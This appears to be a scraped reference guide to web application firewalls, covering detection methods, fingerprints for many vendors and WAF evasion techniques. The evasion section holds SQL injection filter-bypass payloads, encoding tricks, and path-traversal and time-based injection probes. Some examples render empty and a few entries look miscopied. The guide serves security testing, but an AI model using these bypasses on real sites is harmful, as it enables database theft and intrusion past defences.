Informatique Everything about web application firewalls (WAFs) from a security perspective. đŸ”„ A Concise Definition: A firewall is a security policy enforcement point positioned between a web application and the client endpoint. This functionality can be implemented in software or hardware, running in an appliance device, or in a typical server running a common operating system. It may be a stand-alone device or integrated into other network components. (Source: PCI DSS IS 6.6 ) A web-application firewall sits between a user and a webapp and is tasked to prevent any malicious activity from reaching the webapp. A WAF either filters out the malicious part of the request or just simply blocks it. Feel free to contribute . Contents: Introduction How WAFs Work Operation Modes Testing Methodology Where To Look Detection Techniques WAF Fingerprints Evasion Techniques Fuzzing/Bruteforcing Regex Reversing Obfuscation/Encoding Browser Bugs HTTP Header Spoofing Google Dorks Approach Known Bypasses Awesome Tooling Fingerprinting Testing Evasion Blogs & Writeups Video Presentations Research Presentations & Papers Research Papers Presentation Slides Licensing & Credits Introduction: How WAFs Work: Using a set of rules to distinguish between normal requests and malicious requests. Sometimes they use a learning mode to add rules automatically through learning about user behaviour. Operation Modes: Negative Model (Blacklist based) - A blacklisting model uses pre-set signatures to block requests that are clearly malicious. The signatures of WAFs operating in a negative model are specifically crafted to prevent attacks which exploit certain web application vulnerabilities. Blacklisting model web application firewalls are a great choice for web applications exposed to the public internet and are highly effective against major vulnerabilities. Eg. Rule for blocking all inputs prevent basic cross-site scripting attacks. Positive Model (Whitelist based) - A whitelisting model only allows web traffic according to specifically configured criteria. For example, it can be configured to only allow HTTP GET requests from certain IP addresses. This model can be very effective for blocking potential large scale attacks, but will also block a lot of legitimate traffic. Whitelisting model firewalls are probably best for web applications on an internal network that are designed to be used by only a limited group of people, such as employees. Mixed/Hybrid Model (Inclusive model) - A hybrid security model blends both whitelisting and blacklisting. Depending on all sorts of configuration specifics, hybrid firewalls could be the best choice for both web applications on internal networks and web applications on the public internet. A good scenario can be when web-application is facing the public internet (use blacklists) while the admin panel needs to be exposed to only a subset of users (use whitelists). Testing Methodology: Where To Look: Always look out for common ports that expose that a WAF, namely 80 , 443 , 8000 , 8080 and 8888 ports. However, its important to note that a WAF can be easily deployed on any port running a HTTP service. It is good to enumerate HTTP service ports first hand and then look for WAFs. Some WAFs set their own cookies in requests (e.g. Citrix Netscaler, Yunsuo WAF). Some associate themselves with separate headers (e.g. Anquanbao WAF, Amazon AWS WAF). Some often alter headers and jumble characters to confuse attacker (e.g. Netscaler, Big-IP). Some expose themselves in the Server header (e.g. Approach, WTS WAF). Some WAFs expose themselves in the response content (e.g. DotDefender, Armor, Sitelock). Other WAFs reply with unusual response codes upon malicious requests (e.g. WebKnight, 360 WAF). Detection Techniques: To identify WAFs, we need to (dummy) provoke it. Make a normal GET request from a browser, intercept and record response headers (specifically cookies). Make a request from command line (eg. cURL), and test response content and headers (no user-agent included). Make GET requests to random open ports and grab banners which might expose the WAFs identity. On login pages, inject common (easily detectable) payloads like " or 1 = 1 -- . Inject noisy payloads like into search bars, contact forms and other input fields. Attach a dummy ../../../etc/passwd to a random parameter at end of URL. Append some catchy keywords like ' OR SLEEP(5) OR ' at end of URLs to any random parameter. Make GET requests with outdated protocols like HTTP/0.9 ( HTTP/0.9 does not support POST type queries). Many a times, the WAF varies the Server header upon different types of interactions. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response. Tip: This method could be easily achieved with tools like HPing3 or Scapy . Side Channel Attacks - Examine the timing behaviour of the request and response content. Tip: More details can be found in a blogpost here . WAF Fingerprints Wanna fingerprint WAFs? Lets see how. NOTE : This section contains manual WAF detection techniques. You might want to switch over to next section . WAF Fingerprints 360 Detectability: Easy Detection Methodology: Returns status code 493 upon unusual requests. Blockpage may contain reference to wzws-waf-cgi/ directory. Blocked response page source may contain: Reference to wangshan.360.cn URL. Sorry! Your access has been intercepted because your links may threaten website security. text snippet. Response headers may contain X-Powered-By-360WZB header. Blocked response headers contain unique header WZWS-Ray . Server header may contain value qianxin-waf . aeSecure Detectability: Moderate Detection Methodology: Blocked response content contains aesecure_denied.png image (view source to see). Response headers contain aeSecure-code value. Airlock Detectability: Moderate/Difficult Detection Methodology: Set-Cookie headers may contain: AL-SESS cookie field name (case insensitive). AL-LB value (case insensitive). Blocked response page contains: Server detected a syntax error in your request text. Check your request and all parameters text snippet. AlertLogic Detectability: Difficult Detection Methodology: Blocked response page contains: We are sorry, but the page you are looking for cannot be found text snippet. The page has either been removed, renamed or temporarily unavailable text. 404 Not Found in red letters. Aliyundun Detectability: Easy Detection Methodology: Blocked response page contains: Sorry, your request has been blocked as it may cause potential threats to the server's security text snippet. Reference to errors.aliyun.com site URL. Blocked response code returned is 405 . Anquanbao Detectability: Easy Detection Methodology: Returns blocked HTTP response code 405 upon malicious requests. Blocked response content may contain /aqb_cc/error/ or hidden_intercept_time . Response headers contain X-Powered-by-Anquanbao header field. Anyu Detectability: Easy Detection Methodology: Blocked response content contains Sorry! your access has been intercepted by AnYu Blocked response page contains AnYu- the green channel text. Response headers may contain unusual header WZWS-RAY . Approach Detectability: Easy Detection Methodology: Blocked response page content may contain: Approach Web Application Firewall Framework heading. Your IP address has been logged and this information could be used by authorities to track you. warning. Sorry for the inconvenience! keyword. Approach infrastructure team text snippet. Server header has field value set to Approach . Armor Defense Detectability: Easy Detection Methodology: Blocked response content contains: This request has been blocked by website protection from Armor text. If you manage this domain please create an Armor support ticket snippet. ArvanCloud Detectability: Easy Detection Methodology: Server header contains ArvanCloud keyword. ASPA Detectability: Easy Detection Methodology: Server header contains ASPA-WAF keyword. Response contain unique header ASPA-Cache-Status with content HIT or MISS . ASP.NET Generic Detectability: Moderate Detection Methodology: Response headers may contain X-ASPNET-Version header value. Blocked response page content may contain: This generic 403 error means that the authenticated user is not authorized to use the requested resource . Error Code 0x00000000< keyword. X-Powered-By header has field value set to ASP.NET . Astra Detectability: Easy Detection Methodology: Blocked response page content may contain: Sorry, this is not allowed. in h1 . our website protection system has detected an issue with your IP address and wont let you proceed any further text snippet. Reference to www.getastra.com/assets/images/ URL. Response cookies has field value cz_astra_csrf_cookie in response headers. AWS ELB Detectability: Moderate Detection Methodology: Response headers might contain: AWSALB cookie field value. X-AMZ-ID header. X-AMZ-REQUEST-ID header. Response page may contain: Access Denied in their keyword. Request token ID with length from 20 to 25 between RequestId tag. Server header field contains awselb/2.0 value. Baidu Yunjiasu Detectability: Moderate Detection Methodology: Server header may contain Yunjiasu-nginx value. Server header may contain Yunjiasu value. Barikode Detectability: Easy Detection Methodology: Blocked response page content contains: BARIKODE keyword. Forbidden Access text snippet in h1 . Barracuda Detectability: Moderate Detection Methodology: Response cookies may contain barra_counter_session value. Response headers may contain barracuda_ keyword. Response page contains: You have been blocked heading. You are unable to access this website text. Bekchy Detectability: Easy Detection Methodology: Blocked response headers contains Bekchy - Access Denied . Blocked response page contains reference to https://bekchy.com/report . BinarySec Detectability: Moderate Detection Methodology: Response headers contain: X-BinarySec-Via field. X-BinarySec-NoCache field. Server header contains BinarySec keyword. BitNinja Detectability: Easy Detection Methodology: Blocked response page may contain: Security check by BitNinja text snippet. your IP will be removed from BitNinja . Visitor anti-robot validation text snippet. (You will be challenged by a reCAPTCHA page) text. BIG-IP ASM Detectability: Moderate Detection Methodology: Response headers may contain BigIP or F5 keyword value. Response header fields may contain X-WA-Info header. Response headers might have jumbled X-Cnection field value. BlockDos Detectability: Moderate Detection Methodology: Server header contains value BlockDos.net . Bluedon IST Detectability: Easy Detection Methodology: Server header contains BDWAF field value. Blocked response page contains to Bluedon Web Application Firewall text snippet.. BulletProof Security Pro Detectability: Moderate Detection Methodology: Blocked response page contains: div with id as bpsMessage text snippet. If you arrived here due to a search or clicking on a link click your Browser's back button to return to the previous page. text snippet. CDN NS Application Gateway Detectability: Easy Detection Methodology: Blocked response page contains CdnNsWAF Application Gateway text snippet. Cerber (WordPress) Detectability: Difficult Detection Methodology: Blocked response page contains: We're sorry, you are not allowed to proceed text snippet. Your request looks suspicious or similar to automated requests from spam posting software warning. Chaitin Safeline Detectability: Difficult Detection Methodology: Blocked response page contains event_id keyword within HTML comments. ChinaCache Detectability: Easy Detection Methodology: Response headers contain Powered-by-ChinaCache field. Cisco ACE XML Gateway Detectability: Moderate Detection Methodology: Server header has value ACE XML Gateway set. Cloudbric Detectability: Moderate Detection Methodology: Response content contains: Malicious Code Detected heading. Your request was blocked by Cloudbric text snippet. Reference to https://cloudbric.zendesk.com URL. Cloudbric Help Center text. Page title starting with Cloudbric | ERROR! . Cloudflare Detectability: Easy Detection Methodology: Response headers might have cf-ray field value. Server header field has value cloudflare . Set-Cookie response headers have __cfuid= cookie field. Page content might have Attention Required! or Cloudflare Ray ID: . Page content may contain DDoS protection by Cloudflare as text. You may encounter CLOUDFLARE_ERROR_500S_BOX upon hitting invalid URLs. CloudfloorDNS Detectability: Easy Detection Methodology: Server header field has value CloudfloorDNS WAF . Block-page title might have CloudfloorDNS - Web Application Firewall Error . Page content may contain www.cloudfloordns.com/contact URL as a contact link. Cloudfront Detectability: Easy Detection Methodology: Blocked response content contains Generated by cloudfront (CloudFront) error upon malicious request. Comodo cWatch Detectability: Easy Detection Methodology: Server header contains Protected by COMODO WAF value. CrawlProtect Detectability: Easy Detection Methodology: Response cookies might contain crawlprotect cookie name. Block Page title has CrawlProtect keyword in it. Blocked response content contains value This site is protected by CrawlProtect !!! upon malicious request. Deny-All Detectability: Difficult Detection Methodology: Response content contains value Condition Intercepted . Set-Cookie header contains cookie field sessioncookie . Distil Web Protection Detectability: Easy Detection Methodology: Response headers contain field value X-Distil-CS in all requests. Blocked response page contains: Pardon Our Interruption... heading. You have disabled javascript in your browser. text snippet. Something about your browser made us think that you are a bot. text. DoSArrest Internet Security Detectability: Easy Detection Methodology: Response headers contain field value X-DIS-Request-ID . Server header contains DOSarrest keyword. DotDefender Detectability: Easy Detection Methodology: Blocked response content contains value dotDefender Blocked Your Request . Blocked response headers contain X-dotDefender-denied field value. DynamicWeb Injection Check Detectability: Easy Detection Methodology: Blocked response headers contain X-403-Status-By field with value dw-inj-check value. e3Learning Security Detectability: Easy Detection Methodology: Server header contains e3Learning_WAF keyword. EdgeCast (Verizon) Detectability: Easy Detection Methodology: Blocked response content contains value Please contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon) . Blocked response code returns 400 Bad Request on malicious requests. Eisoo Cloud Detectability: Easy Detection Methodology: Blocked response page content may contain: /eisoo-firewall-block.css reference. www.eisoo.com URL. © (year) Eisoo Inc. keyword. Server header has field value set to EisooWAF-AZURE/EisooWAF . Expression Engine Detectability: Difficult Detection Methodology: Blocked response page returns Invalid URI generally. Blocked response content contains value Invalid GET Request upon malicious GET queries. Blocked POST type queries contain Invalid Data in response content. F5 ASM Detectability: Difficult Detection Methodology: Blocked response content contains warning The requested URL was rejected. Please consult with your administrator. FortiWeb Detectability: Moderate Detection Methodology: Response headers contain FORTIWAFSID= on malicious requests. Blocked response page contains: Reference to .fgd_icon image icon. Server Unavailable! as heading. Server unavailable. Please visit later. as text. GoDaddy Detectability: Easy Detection Methodology: Blocked response page contains value Access Denied - GoDaddy Website Firewall . GreyWizard Detectability: Easy Detection Methodology: Blocked response page contains: Grey Wizard as title. Contact the website owner or Grey Wizard text snippet. We've detected attempted attack or non standard traffic from your IP address text snippet. Server header contain greywizard keyword. Huawei Cloud Detectability: Easy Detection Methodology: Blocked response page contains: Reference to account.hwclouds.com/static/error/images/404img.jpg error image. Reference to www.hwclouds.com URL. Reference to hws_security@{site.tld} e-mail for reporting. HyperGuard Detectability: Difficult Detection Methodology: Set-Cookie header has cookie field ODSESSION= in response headers. IBM DataPower Detectability: Difficult Detection Methodology: Response headers contains field value value X-Backside-Transport with value OK or FAIL . Imperva Incapsula Detectability: Easy Detection Methodology: Blocked response page content may contain: Powered By Incapsula text snippet. Incapsula incident ID keyword. _Incapsula_Resource keyword. subject=WAF Block Page keyword. Normal GET request headers contain visid_incap value. Response headers may contain X-Iinfo header field name. Set-Cookie header has cookie field incap_ses and visid_incap . Imunify360 Detectability: Easy Detection Methodology: Server header contain imunify360-webshield keyword. Response page contains: Powered by Imunify360 text snippet. imunify360 preloader if response type is JSON. Blocked response page contains protected by Imunify360 text. IndusGuard Detectability: Moderate Detection Methodology: Server header contains value IF_WAF . Blocked response content contains warning further investigation and remediation with a screenshot of this page. Response headers contain a unique header X-Version . Instart DX Detectability: Easy Detection Methodology: Response headers contain X-Instart-Request-ID unique header. Response headers contain X-Instart-WL unique header fingerprint. Response headers contain X-Instart-Cache unique header fingerprint. Blocked response page contains The requested URL was rejected. Please consult with your administrator. text. ISA Server Detectability: Difficult Detection Methodology: Response page contains: The ISA Server denied the specified Uniform Resource Locator (URL) text snippet. The server denied the specified Uniform Resource Locator (URL). Contact the server administrator. text snippet Janusec Application Gateway Detectability: Easy Detection Methodology: Blocked response page has image displaying JANUSEC name and logo. Blocked response page displays Janusec Application Gateway on malicious requests. Jiasule Detectability: Easy Detection Methodology: Blocked response page contains reference to static.jiasule.com/static/js/http_error.js URL. Set-Cookie header has cookie field __jsluid= or jsl_tracking in response headers. Server header has jiasule-WAF keywords. Blocked response content has notice-jiasule keyword. KeyCDN Detectability: Easy Detection Methodology: Server header contains KeyCDN keyword. KnownSec Detectability: Easy Detection Methodology: Blocked response page displays ks-waf-error.png image (view source to see). KONA Site Defender (Akamai) Detectability: Easy Detection Methodology: Server header contains AkamaiGHost keyword. LiteSpeed Detectability: Easy Detection Methodology: Server header has value set to LiteSpeed . Response page contains: Proudly powered by LiteSpeed Web Server text. Reference to http://www.litespeedtech.com/error-page Access to resource on this server is denied. Malcare Detectability: Moderate Detection Methodology: Blocked response page may contains: Blocked because of Malicious Activities text snippet. Firewall powered by MalCare text snippet. MissionControl Application Shield Detectability: Easy Detection Methodology: Server header field contains Mission Control Application Shield value. ModSecurity Detectability: Moderate/Difficult Detection Methodology: Blocked response page contains: This error was generated by Mod_Security text snippet. One or more things in your request were suspicious text snippet. rules of the mod_security module text snippet. mod_security rules triggered text snippet. Reference to /modsecurity-errorpage/ directory. Server header may contain Mod_Security or NYOB keywords. Sometimes, the response code to an attack is 403 while the response phrase is ModSecurity Action . ModSecurity CRS Detectability: Difficult Detection Methodology: Blockpage occurs on adding a separate request header X-Scanner when set to a particular paranoa level. NAXSI Detectability: Easy Detection Methodology: Blocked response page contains This Request Has Been Blocked By NAXSI . Response headers contain unusual field X-Data-Origin with value naxsi/waf keyword. Server header contains naxsi/waf keyword value. Blocked response page may contain NAXSI blocked information error code. Nemesida Detectability: Difficult Detection Methodology: Blocked response page contains Suspicious activity detected. Access to the site is blocked. . Contains reference to email nwaf@{site.tld} Netcontinuum Detectability: Moderate Detection Methodology: Session cookies contain NCI__SessionId= cookie field name. NetScaler AppFirewall Detectability: Moderate Detection Methodology: Response headers may contain Connection: header field name jumbled to nnCoection: ns_af= cookie field name. citrix_ns_id field name. NSC_ keyword. NS-CACHE field value. NevisProxy Detectability: Moderate Detection Methodology: Response header cookies contain Navajo keyword. NewDefend Detectability: Easy Detection Methodology: Response page contains: Reference to http://www.newdefend.com/feedback/misinformation/ URL. Reference to /nd_block/ directory. Server header contains NewDefend keyword. Nexusguard Detectability: Easy Detection Methodology: Blocked response page has reference to speresources.nexusguard.com/wafpage/index.html URL. NinjaFirewall Detectability: Moderate Detection Methodology: Response page title contains NinjaFirewall: 403 Forbidden . Response page contains: For security reasons, it was blocked and logged text snippet. NinjaFirewall keyword in title. Returns a 403 Forbidden response upon malicious requests. NSFocus Detectability: Easy Detection Methodology: Server header contain NSFocus keyword. NullDDoS Detectability: Easy Detection Methodology: Server header contains the NullDDoS System keyword. onMessage Shield Detectability: Easy Detection Methodology: Response headers contain header X-Engine field with value onMessage Shield . Blocked response page contains: Blackbaud K-12 conducts routine maintenance keyword. This site is protected by an enhanced security system . Reference to https://status.blackbaud.com URL. Reference to https://maintenance.blackbaud.com URL. OpenResty Lua WAF Detectability: Easy Detection Methodology: Server header contains openresty/{version} keyword. Blocked response page contains openresty/{version} text. Blocked response code returned is 406 Not Acceptable . Palo Alto Detectability: Moderate Detection Methodology: Blocked response page contains Virus/Spyware Download Blocked . Response page might contain Palo Alto Next Generation Security Platform text snippet. PentaWAF Detectability: Easy Detection Methodology: Server header contains PentaWAF/{version} keyword. Blocked response page contains text PentaWAF/{version} . PerimeterX Detectability: Easy Detection Methodology: Blocked response page contains reference to https://www.perimeterx.com/whywasiblocked URL. pkSecurityModule IDS Detectability: Moderate Detection Methodology: Response content may contain pkSecurityModule: Security.Alert . A safety critical request was discovered and blocked text snippet. Positive Technologies Application Firewall Detectability: Difficult Detection Methodology: Blocked response page contains Forbidden in h1 followed by: Request ID: in format yyyy-mm-dd-hh-mm-ss-{ref. code} PowerCDN Detectability: Moderate Detection Methodology: Response headers may contain Via header with content powercdn.com . X-Cache header with content powercdn.com . X-CDN header with content PowerCDN . Profense Detectability: Easy Detection Methodology: Set-Cookie headers contain PLBSID= cookie field name. Server header contain Profense keyword. Proventia (IBM) Detectability: Difficult Detection Methodology: Blocked response page might contain to request does not match Proventia rules text snippet. Puhui Detectability: Easy Detection Methodology: Server header contain PuhuiWAF keyword. Qiniu CDN Detectability: Easy Detection Methodology: Response content may contain Response headers contain unusual header X-Qiniu-CDN with value set to either 0 or 1 . Radware Appwall Detectability: Moderate Detection Methodology: Response page contains the following text snippet: Unauthorized Activity Has Been Detected. and Case Number Blocked response page has reference to radwarealerting@{site.tld} email. Blocked response page has title set to Unauthorized Request Blocked . Response headers may contain X-SL-CompState header field name. Reblaze Detectability: Moderate Detection Methodology: Cookies in response headers contain rbzid= header field name. Server field value might contain Reblaze Secure Web Gateway text snippet. Response page contains: Access Denied (403) in bold. Current session has been terminated text. For further information, do not hesitate to contact us . Request Validation Mode Detectability: Easy Detection Methodology: A firewall found specifically on ASP.NET websites and none others. Response page contains either of the following text snippet: ASP.NET has detected data in the request that is potentially dangerous. Request Validation has detected a potentially dangerous client input value. HttpRequestValidationException. Blocked response code returned is always 500 Internal Error . RSFirewall Detectability: Easy Detection Methodology: Response page contains: COM_RSFIREWALL_403_FORBIDDEN keyword. COM_RSFIREWALL_EVENT keyword. Sabre Detectability: Easy Detection Methodology: Returns status code 500 Internal Error upon malicious requests. Response content has: Contact email dxsupport@sabre.com . Your request has been blocked bold warning. clicking the above email link will automatically add some important details to the email for us to investigate the problem text snippet. Safe3 Detectability: Easy Detection Methodology: Response headers contain: X-Powered-By header has field value Safe3WAF . Server header contains field value set to Safe3 Web Firewall . Response page contains Safe3waf keyword. SafeDog Detectability: Easy/Moderate Detection Methodology: Server header in response may contain: WAF/2.0 keyword. safedog field value. SecKing Detectability: Easy/Moderate Detection Methodology: Server header in response may contain: SECKINGWAF keyword. SECKING/{version} field value. SecuPress Detectability: Easy Detection Methodology: Response content may contain: SecuPress as text. Block ID: Bad URL Contents as text. Response code returned is 503 Service Unavailable . Secure Entry Detectability: Easy Detection Methodology: Server header contains value set to Secure Entry Server . SecureIIS Detectability: Easy Detection Methodology: Response page contains either of the following text snippet: Image displaying beyondtrust logo. Download SecureIIS Personal Edition Reference to http://www.eeye.com/SecureIIS/ URL. SecureIIS Error text snippet. SecureSphere Detectability: Difficult Detection Methodology: Response page contains the following text snippet: Error in h2 text. Title contains only text as Error . Contact support for additional information. text. SEnginx Detectability: Easy Detection Methodology: Blocked response page contains SENGINX-ROBOT-MITIGATION keyword. ServerDefender VP Detectability: Easy Detection Methodology: Blocked response contains X-Pint header field with p80 keyword. Shadow Daemon Detectability: Difficult Detection Methodology: Blocked response page contains request forbidden by administrative rules. keyword. ShieldSecurity Detectability: Difficult Detection Methodology: Blocked response page contains: You were blocked by the Shield. text. Something in the URL, Form or Cookie data wasn't appropriate text snippet. Warning: You have {number} remaining transgression(s) against this site . Seriously stop repeating what you are doing or you will be locked out . SiteGround Detectability: Difficult Detection Methodology: Blocked response page contains The page you are trying to access is restricted due to a security rule text snippet. SiteGuard (JP Secure) Detectability: Difficult Detection Methodology: Response page contains: Powered by SiteGuard text snippet. The server refuse to browse the page. text snippet. The URL may not be correct. Please confirm the value. SiteLock TrueShield Detectability: Easy Detection Methodology: Blocked response page source contains the following: Reference to www.sitelock.com URL. Sitelock is leader in Business Website Security Services. text. sitelock-site-verification keyword. sitelock_shield_logo image. SonicWall Detectability: Easy Detection Methodology: Server header contain SonicWALL keyword value. Blocked response page contains either of the following text snippet: Image displaying Dell logo. This request is blocked by the SonicWALL. Web Site Blocked text snippet. nsa_banner as keyword. :p Sophos UTM Detectability: Easy Detection Methodology: Blocked response page contains Powered by UTM Web Protection keyword. SquareSpace Detectability: Difficult Detection Methodology: Response code returned is 404 Not Found upon malicious requests. Blocked response page contains either of the following text snippet: BRICK-50 keyword. 404 Not Found text snippet. SquidProxy IDS Detectability: Easy Detection Methodology: Server header contains field value squid/{version} . Blocked response page contains Access control configuration prevents your request from being allowed at this time. . StackPath Detectability: Easy Detection Methodology: Contains image displaying StackPath logo. Blocked response page contains You performed an action that triggered the service and blocked your request . Stingray Detectability: Difficult Detection Methodology: Blocked response code returns 403 Forbidden or 500 Internal Error . Response headers contain the X-Mapping header field name. Sucuri CloudProxy Detectability: Easy Detection Methodology: Response headers may contain Sucuri or Cloudproxy keywords. Blocked response page contains the following text snippet: Access Denied - Sucuri Website Firewall text. Reference to https://sucuri.net/privacy-policy URL. Sometimes the email cloudproxy@sucuri.net . Contains copyright notice ;copy {year} Sucuri Inc . Response headers contains X-Sucuri-ID header along with normal requests. Synology Cloud Detectability: Easy Detection Methodology: Blocked response page has Copyright (c) 2019 Synology Inc. All rights reserved. as text. Tencent Cloud Detectability: Moderate Detection Methodology: Blocked response code returns 405 Method Not Allowed error. Blocked response page contains reference to waf.tencent-cloud.com URL. Teros Detectability: Difficult Detection Methodology: Response headers contain cookie field st8id . TrafficShield Detectability: Moderate Detection Methodology: Server might contain F5-TrafficShield keyword. ASINFO= value might be detected in response cookies. TransIP Detectability: Easy Detection Methodology: Response headers contain unique header X-TransIP-Backend . Response headers contain another header X-TransIP-Balancer . UCloud UEWaf Detectability: Easy Detection Methodology: Response content might contain: Reference to /uewaf_deny_pages/default/img/ inurl directory. ucloud.cn URL. Response headers returned has Server header set to uewaf/{version} . URLMaster SecurityCheck Detectability: Moderate Detection Methodology: Response headers might contain: UrlMaster keyword. UrlRewriteModule keyword. SecurityCheck keyword. Blocked response code returned is 400 Bad Request text snippet. URLScan Detectability: Moderate Detection Methodology: Blocked response page contains: Rejected-by-URLScan text snippet. Server Erro in Application as heading. Module: IIS Web Core in table. USP Secure Entry Detectability: Moderate Detection Methodology: Response headers contain Secure Entry Server field value. Varnish (OWASP) Detectability: Easy Detection Methodology: Malicious request returns 404 Not Found Error. Response page contains: Request rejected by xVarnish-WAF text snippet. Varnish CacheWall Detectability: Easy Detection Methodology: Response page contains: Error 403 Naughty, not Nice! as heading. Varnish cache Server as text. Viettel Detectability: Easy Detection Methodology: Response page contains: Block page has title set to Access denied · Viettel WAF . Reference to https://cloudrity.com.vn/ URL. Response page contains keywords Viettel WAF system . Contact information reference to https://cloudrity.com.vn/customer/#/contact URL. VirusDie Detectability: Easy Detection Methodology: Response page contains: http://cdn.virusdie.ru/splash/firewallstop.png picture. copy; Virusdie.ru copyright notice. Response page title contains Virusdie keyword. Page metadata contains name="FW_BLOCK" keyword WallArm Detectability: Moderate Detection Methodology: Server headers contain nginx-wallarm value. WatchGuard IPS Detectability: Easy Detection Methodology: Server headers may contain WatchGuard field value. Blocked response page contains: Request denied by WatchGuard Firewall text. WatchGuard Technologies Inc. as footer. WebARX Security Detectability: Easy Detection Methodology: Restricted to specifically WordPress sites only. Blocked response page contains: This request has been blocked by WebARX Web Application Firewall text. Reference to /wp-content/plugins/webarx/ directory where it is installed. WebKnight Detectability: Easy Detection Methodology: Response headers contain WebKnight keyword. Blocked response page contains: WebKnight Application Firewall Alert text warning. AQTRONIX WebKnight text snippet. Blocked response code returned is 999 No Hacking . :p Blocked response code returned is also 404 Hack Not Found . :p WebLand Detectability: Easy Detection Methodology: Server header contains Apache Protected By WebLand WAF keyword. WebRay Detectability: Easy Detection Methodology: Server header contains WebRay-WAF keyword. Response headers may have DrivedBy field with value RaySrv RayEng/{version} . WebSEAL Detectability: Easy Detection Methodology: Server header contain WebSEAL keyword. Blocked response page contains: This is a WebSEAL error message template file text. WebSEAL server received an invalid HTTP request text snippet. WebTotem Detectability: Easy Detection Methodology: Blocked response page contains The current request was blocked by WebTotem . West263CDN Detectability: Easy Detection Methodology: Response headers contain X-Cache header field with WT263CDN value. Wordfence Detectability: Easy Detection Methodology: Response headers contain WebKnight keyword. Blocked response page contains: Generated by Wordfence text snippet. A potentially unsafe operation has been detected in your request to this site text warning. Your access to this site has been limited text warning. This response was generated by Wordfence text snippet. WTS-WAF Detectability: Easy Detection Methodology: Blocked response page title has WTS-WAF keyword. Server header contains wts as value. XLabs Security WAF Detectability: Easy Detection Methodology: Response headers contain X-CDN header field with XLabs Security value. Xuanwudun WAF Detectability: Easy Detection Methodology: Blocked response page contains reference to http://admin.dbappwaf.cn/index.php/Admin/ClientMisinform/ site URL. Yunaq Chuangyu Detectability: Moderate Detection Methodology: Response page has reference to: 365cyd.com or 365cyd.net URL. Reference to help page at http://help.365cyd.com/cyd-error-help.html?code=403 . Yundun Detectability: Easy Detection Methodology: Server header contains YUNDUN as value. X-Cache header field contains YUNDUN as value. Response page contains Blocked by YUNDUN Cloud WAF text snippet. Blocked response page contains reference to yundun.com/yd_http_error/ URL. Yunsuo Detectability: Easy Detection Methodology: Blocked response page contains image class reference to yunsuologo . Response headers contain the yunsuo_session field name. YxLink Detectability: Easy Detection Methodology: Response might have yx_ci_session cookie field. Response might have yx_language cookie field. Server header contains Yxlink-WAF field value. ZenEdge Detectability: Easy Detection Methodology: Blocked response page contains reference to /__zenedge/assets/ directory. Server header contain ZENEDGE keyword. Blocked response headers may contain X-Zen-Fury header. ZScaler Detectability: Easy Detection Methodology: Server header has value set to ZScaler . Blocked response page contains: Access Denied: Accenture Policy text. Reference to https://policies.accenture.com URL. Reference to image at https://login.zscloud.net/img_logo_new1.png . Your organization has selected Zscaler to protect you from internet threats . The Internet site you have attempted to access is prohibited. Accenture's webfilters indicate that the site likely contains content considered inappropriate . Evasion Techniques Lets look at some methods of bypassing and evading WAFs. Fuzzing/Bruteforcing: Method: Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists: Wordlists specifically for fuzzing Seclists/Fuzzing . Fuzz-DB/Attack Other Payloads Technique: Load up your wordlist into fuzzer and start the bruteforce. Record/log all responses from the different payloads fuzzed. Use random user-agents, ranging from Chrome Desktop to iPhone browser. If blocking noticed, increase fuzz latency (eg. 2-4 secs). Always use proxychains, since chances are real that your IP gets blocked. Drawbacks: This method often fails. Many a times your IP will be blocked (temporarily/permanently). Regex Reversing: Method: Most efficient method of bypassing WAFs. Some WAFs rely upon matching the attack payloads with the signatures in their databases. Payload matches the reg-ex the WAF triggers alarm. Techniques: Blacklisting Detection/Bypass In this method we try to fingerprint the rules step by step by observing the keywords being blacklisted. The idea is to guess the regex and craft the next payloads which doesn't use the blacklisted keywords. Case : SQL Injection ‱ Step 1: Keywords Filtered : and , or , union Probable Regex : preg_match('/(and|or|union)/i', $id) Blocked Attempt : union select user, password from users Bypassed Injection : 1 || (select user from users where user_id = 1) = 'admin' ‱ Step 2: Keywords Filtered : and , or , union , where Blocked Attempt : 1 || (select user from users where user_id = 1) = 'admin' Bypassed Injection : 1 || (select user from users limit 1) = 'admin' ‱ Step 3: Keywords Filtered : and , or , union , where , limit Blocked Attempt : 1 || (select user from users limit 1) = 'admin' Bypassed Injection : 1 || (select user from users group by user_id having user_id = 1) = 'admin' ‱ Step 4: Keywords Filtered : and , or , union , where , limit , group by Blocked Attempt : 1 || (select user from users group by user_id having user_id = 1) = 'admin' Bypassed Injection : 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1 ‱ Step 5: Keywords Filtered : and , or , union , where , limit , group by , select Blocked Attempt : 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1 Bypassed Injection : 1 || 1 = 1 into outfile 'result.txt' Bypassed Injection : 1 || substr(user,1,1) = 'a' ‱ Step 6: Keywords Filtered : and , or , union , where , limit , group by , select , ' Blocked Attempt : 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1 Bypassed Injection : 1 || user_id is not null Bypassed Injection : 1 || substr(user,1,1) = 0x61 Bypassed Injection : 1 || substr(user,1,1) = unhex(61) ‱ Step 7: Keywords Filtered : and , or , union , where , limit , group by , select , ' , hex Blocked Attempt : 1 || substr(user,1,1) = unhex(61) Bypassed Injection : 1 || substr(user,1,1) = lower(conv(11,10,36)) ‱ Step 8: Keywords Filtered : and , or , union , where , limit , group by , select , ' , hex , substr Blocked Attempt : 1 || substr(user,1,1) = lower(conv(11,10,36)) Bypassed Injection : 1 || lpad(user,7,1) ‱ Step 9: Keywords Filtered : and , or , union , where , limit , group by , select , ' , hex , substr , white space Blocked Attempt : 1 || lpad(user,7,1) Bypassed Injection : 1%0b||%0blpad(user,7,1) Obfuscation: Method: Encoding payload to different encodings (a hit and trial approach). You can encode whole payload, or some parts of it and test recursively. Techniques: 1. Case Toggling Some poorly developed WAFs filter selectively specific case WAFs. We can combine upper and lower case characters for developing efficient payloads. Standard : Bypassed : Standard : SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME' Bypassed : sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME' 2. URL Encoding Encode normal payloads with % encoding/URL encoding. Can be done with online tools like this . Burp includes a in-built encoder/decoder. Blocked : Obfuscated : Blocked : /?redir=http://google.com Bypassed : /?redir=http://google。com (Unicode alternative) Blocked : x Bypassed : marquee loop1 onfinishalertïž”1)>x (Unicode alternative) TIP: Have a look at this and this reports on HackerOne. :) Standard : ../../etc/passwd Obfuscated : 